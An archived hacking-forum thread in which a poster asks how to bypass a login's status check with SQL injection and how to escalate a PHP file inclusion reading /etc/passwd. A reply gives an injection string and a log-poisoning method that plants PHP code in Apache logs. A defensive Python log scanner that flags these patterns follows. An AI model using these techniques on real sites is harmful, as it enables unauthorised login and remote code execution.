Wednesday, April 23, 2014

HellBound Hackers | Computer General | Web hacking


sql Injection + php page inclusion


Guest
Posted on 23-09-11 17:08
Hi

mysql Puzzle

I'm so close but I'm missing something here. If mysql is vulnerable from a login point of view
the username and password fields below are vulnerable to injection and their values are changeable from the login.php page

How do you bypass the status='1'..

I'm asking how do you terminate the query after the "password="secret" "

None of these are my answer I don't think

' or '1'='1' -- '
' or '1'='1' ({ '
' or '1'='1' /* '




select * from user WHERE ( username = 'bob'' and password = 'secret' and status='1' )



php Help

Also if a url can include a file as follows

http:/www.******/index.php?page=/etc/passwd%00
(the above prints out the file contents)

But how do I execute a command or arbitrary php code via the url

Is it possible to close the php syntax in the base code like so

include('/etc/passwd');

I'm not 100% sure I've asked the questions correctly but any guidance would be appreciated.....

I'm a white hat :-)



RE: sql Injection + php page inclusion


Guest
Posted on 23-09-11 18:18
Try this
' OR 1=1)/*
Are you getting any errors?

But how do I execute a command or arbitrary php code via the url


Inject some log with your code and then include the page you injected. For example, if you can find (I'm assuming this server is running Apache) the error_log file, then telnet to the site and do something like:

GET /<?php code here ?> HTTP/1.1

P.S., I don't care if you're white hat or not.
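
A defender's view of the two requests discussed in this thread, as an added example that is not part of either post: a Python scan of access-log lines for abuse of the include parameter, for a PHP tag in the request line, and for one client doing both in sequence. The log lines, the `../logs/error_log` path and the finding names are constructed for illustration; `page` is the parameter from the URL in the first post.

```python
import re
from urllib.parse import parse_qsl, unquote

INCLUDE_PARAM = "page"  # parameter name from the URL quoted in the thread
LINE_RE = re.compile(r'^(\S+) .*?"([A-Z]+) (.*) HTTP/\d\.\d" (\d{3})')
LOG_NAME_RE = re.compile(r"(access|error)[._-]?log", re.I)

# Constructed sample lines in Apache access-log style (not taken from the thread).
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Sep/2011:17:10:01 +0000] "GET /index.php?page=news HTTP/1.1" 200 5120',
    '203.0.113.9 - - [23/Sep/2011:17:11:40 +0000] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 200 1843',
    '203.0.113.9 - - [23/Sep/2011:17:12:02 +0000] "GET /<?php code here ?> HTTP/1.1" 404 209',
    '203.0.113.9 - - [23/Sep/2011:17:12:30 +0000] "GET /index.php?page=../logs/error_log%00 HTTP/1.1" 200 90211',
]

def classify(line):
    """Return (client, status, findings) for one log line, or None if unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    findings = set()
    decoded = unquote(target)
    if "<?" in decoded:
        findings.add("php-tag-in-request")   # script tag that ends up in a log file
    if "\x00" in decoded:
        findings.add("null-byte")            # %00 in the request target
    query = target.partition("?")[2]
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name != INCLUDE_PARAM:
            continue
        if value.startswith("/") or ".." in value:
            findings.add("path-in-include-param")
        if LOG_NAME_RE.search(value):
            findings.add("log-file-include")
    return client, int(status), findings

def poisoning_sequences(lines):
    """Clients that sent a PHP tag and later requested a log file via the include parameter."""
    tagged, flagged = set(), []
    for client, _status, findings in filter(None, map(classify, lines)):
        if "php-tag-in-request" in findings:
            tagged.add(client)
        if "log-file-include" in findings and client in tagged and client not in flagged:
            flagged.append(client)
    return flagged

if __name__ == "__main__":
    print(poisoning_sequences(SAMPLE_LOG))
```

A 200 response on a line flagged `path-in-include-param` means the application served the requested path and is the line to triage first.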